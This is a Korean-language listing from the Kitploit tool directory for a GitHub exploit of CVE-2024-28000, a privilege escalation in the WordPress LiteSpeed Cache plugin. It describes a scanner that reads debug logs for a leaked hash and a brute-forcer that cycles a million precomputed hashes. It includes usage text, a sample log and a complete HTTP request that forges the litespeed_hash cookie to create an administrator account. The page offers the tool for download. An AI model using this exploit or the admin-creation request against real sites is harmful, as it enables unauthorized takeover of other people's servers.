Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-28000 — CVE-2024-28000 LiteSpeed Cache 권한 상승 Scan&Exp | Kitploit
도구/GitHubGitHub/ssssuperx/cve-2024-28000
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationWeb Security
GitHubssssuperx/cve-2024-28000

CVE-2024-28000

CVE-2024-28000 LiteSpeed Cache 권한 상승 Scan&Exp

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

LiteSpeed Cache 권한 상승 익스플로잇

CVE-2024-28000_Scan.py

  • 이 스크립트는 먼저 버전을 식별하여 취약한 버전인지 확인한 후, 로그 파일이 존재하는지 확인합니다. 존재할 경우 패킷을 전송한 후 다시 로그 파일을 요청하여 해시 유출을 찾으려고 시도합니다. LiteSpeed에서 디버그를 활성화하면 올바른 Hash가 유출될 수 있습니다.
root@kitploit:~
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]

CVE-2024-28000 Scan

optional arguments:
  -h, --help            show this help message and exit
  -f F                  File list
  -t T                  Scan thread
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808

예시:

root@kitploit:~
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String: 
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init

LiteSpeed에서 디버그를 활성화하면 위와 같은 로그를 볼 수 있으며, 여기서 pkHrfD가 올바른 Hash입니다.

CVE-2024-28000_Exploit.py

  • 테스트 결과 Python과 PHP로 생성된 Hash는 차이가 있으므로, Hash 리스트를 Python으로 시뮬레이션하여 생성할 수 없습니다. Hash_list.txt 파일은 PHP로 생성된 1,000,000개의 Hash입니다. 따라서 이론적으로 최대 1,000,000번을 순회하면 올바른 Hash를 찾을 수 있습니다.
root@kitploit:~
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]

CVE-2024-28000

optional arguments:
  -h, --help            show this help message and exit
  -u U                  url
  -t T                  Scan thread
  -d D                  Dict list
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
  • -d 인자는 Hash 리스트, -u는 URL, -t는 스레드 수입니다. 스레드는 너무 높게 설정하지 않는 것이 좋습니다.

테스트

  • 실습 환경에서 테스트했을 때 Hash를 성공적으로 찾을 수 있었으며, 재설치를 5번 반복해도 생성된 Hash 리스트에 Hash가 있음을 확인했습니다. 그러나 여러 측면에서 실제 공격에서의 성공률은 낮습니다.
  • 올바른 Hash를 찾은 후에는 아래 패킷을 사용하여 admin 사용자를 추가할 수 있습니다.
root@kitploit:~
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=올바른Hash; litespeed_role=1
Content-Length: 122
Content-Type: application/json

{"username": "username", "password": "password", "email": "[email protected]", "roles": ["administrator"]}
도구 다운로드